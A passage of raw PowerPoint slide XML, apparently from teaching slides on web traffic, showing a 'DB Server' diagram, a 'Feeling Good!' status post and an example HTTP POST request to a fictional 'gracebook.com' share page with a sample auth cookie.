                  <a:lnTo>
                    <a:pt x="116819" y="1225924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="1212650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="1182218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1147826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10685272" y="1682664"/>
            <a:ext cx="828040" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1693" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="object 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8595698" y="1583267"/>
            <a:ext cx="1868593" cy="1483360"/>
            <a:chOff x="6446773" y="1187450"/>
            <a:chExt cx="1401445" cy="1112520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6887590" y="1800351"/>
              <a:ext cx="960755" cy="499109"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="854860" y="42247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="464947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16890" y="499110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="956675" y="11049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934847" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837691" y="128016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834828" y="135018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834882" y="142319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837674" y="149072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843026" y="154431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850028" y="157293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857329" y="157225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864082" y="154396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869441" y="148971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960374" y="11302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956675" y="11049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="892617" y="44861"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="871792" y="76390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930994" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="910589" y="17652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="921221" y="17652"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925194" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930994" y="47117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934847" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921221" y="17652"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="917955" y="11049"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892617" y="44861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910589" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921221" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="960754" h="499110">
                  <a:moveTo>
                    <a:pt x="795781" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="788267" y="972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781954" y="4635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777476" y="10394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775461" y="17652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776434" y="25185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780097" y="31527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785856" y="36012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793114" y="37973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854860" y="42247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917955" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956675" y="11049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795781" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6459473" y="1200150"/>
              <a:ext cx="1295400" cy="762635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1295400" h="762635">
                  <a:moveTo>
                    <a:pt x="1295400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7466456" y="1673733"/>
              <a:ext cx="288925" cy="288925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="288925" h="288925">
                  <a:moveTo>
                    <a:pt x="288417" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57658" y="57657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="288543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288417" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CDCDCD"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6459473" y="1200150"/>
              <a:ext cx="1295400" cy="762635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1295400" h="762635">
                  <a:moveTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1064641" y="531240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1006982" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="762126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1295400" y="473583"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="object 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8970263" y="1631356"/>
            <a:ext cx="1013460" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“F</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>el</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ng  Good!”</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="object 51"/>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8"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-167" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>acebook.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="object 52"/>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313176" y="450638"/>
            <a:ext cx="5565987" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-87" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1588009"/>
            <a:ext cx="8675793" cy="674608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Th</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>POS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-1573" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eque</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t loo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-160" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e this:</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="3078835"/>
            <a:ext cx="7518400" cy="2809381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="51647" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121917" marR="4439809">
              <a:spcBef>
                <a:spcPts val="407"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/share.php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.gracebook.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Mozilla/5.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Accept:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> */*</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917" marR="1492636"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>application/x-www-form-urlencoded; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>charset=UTF-8</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917">
              <a:lnSpc>
                <a:spcPts val="1880"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Referer:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="489361">
              <a:lnSpc>
                <a:spcPts val="1880"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.gracebook.com/form.php</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917">
              <a:spcBef>
                <a:spcPts val="87"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="120" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8</a:t>
            </a:r>
